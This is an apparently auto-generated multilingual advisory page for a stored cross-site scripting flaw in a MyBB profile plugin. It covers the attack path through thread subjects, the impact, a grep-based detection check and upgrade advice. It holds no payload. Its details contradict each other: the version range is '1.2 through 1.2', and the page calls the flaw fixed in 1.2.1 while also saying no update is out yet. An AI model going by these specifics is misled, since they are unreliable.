Plateforme
php
Composant
mybb-last-users-threads-in-profile
Corrigé dans
1.2.1
CVE-2018-25250 describes a persistent cross-site scripting (XSS) vulnerability found in the MyBB Last User's Threads in Profile Plugin. This flaw allows attackers to inject malicious scripts into a user's profile page, potentially leading to session hijacking or defacement. The vulnerability affects versions 1.2 through 1.2 of the plugin, and a fix is available via plugin update.
An attacker can exploit this XSS vulnerability by crafting thread subjects containing malicious script tags. When a user visits the attacker's profile page, the embedded script executes within the user's browser context. This allows the attacker to steal cookies, redirect the user to a malicious website, or modify the content of the profile page. The impact can range from simple annoyance to complete account compromise, depending on the attacker's payload and the user's privileges.
CVE-2018-25250 was publicly disclosed on 2026-04-04. There are currently no known active campaigns exploiting this specific vulnerability, but XSS vulnerabilities are frequently targeted. Public proof-of-concept exploits are likely to emerge given the ease of exploitation. This vulnerability is not currently listed on the CISA KEV catalog.
Administrators and users of MyBB forums who have installed the Last User's Threads in Profile Plugin versions 1.2–1.2 are at risk. Shared hosting environments where multiple MyBB instances are hosted on the same server are particularly vulnerable, as a compromise of one instance could potentially lead to the compromise of others.
• wordpress / composer / npm:
grep -r "<script" /var/www/mybb/plugins/lastusersthreads/• generic web:
curl -I https://your-mybb-site.com/profile.php?uid=1 | grep Content-Typedisclosure
Statut de l'Exploit
EPSS
0.03% (percentile 9%)
CISA SSVC
Vecteur CVSS
The primary mitigation for CVE-2018-25250 is to upgrade the MyBB Last User's Threads in Profile Plugin to a patched version. If upgrading is not immediately feasible, consider implementing input validation on thread subjects to sanitize potentially malicious characters. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a layer of protection. Regularly review MyBB forums and security advisories for updates and further guidance.
Actualice el plugin MyBB Last User's Threads in Profile a la última versión disponible, ya que la versión 1.2 es vulnerable. Verifique la página de descargas del plugin o el foro de MyBB para obtener la versión actualizada. Desactive el plugin si no es esencial hasta que se publique una actualización.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2018-25250 is a cross-site scripting (XSS) vulnerability affecting the MyBB Last User's Threads in Profile Plugin, allowing attackers to inject malicious scripts into user profiles.
You are affected if you are using MyBB Last User's Threads in Profile Plugin versions 1.2–1.2. Upgrade to a patched version to resolve the vulnerability.
Upgrade the MyBB Last User's Threads in Profile Plugin to the latest available version. Input validation and WAF rules can provide temporary mitigation.
There are currently no confirmed reports of active exploitation, but XSS vulnerabilities are frequently targeted, and exploitation is possible.
Refer to the MyBB forums and security advisories for the latest information and updates regarding CVE-2018-25250.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.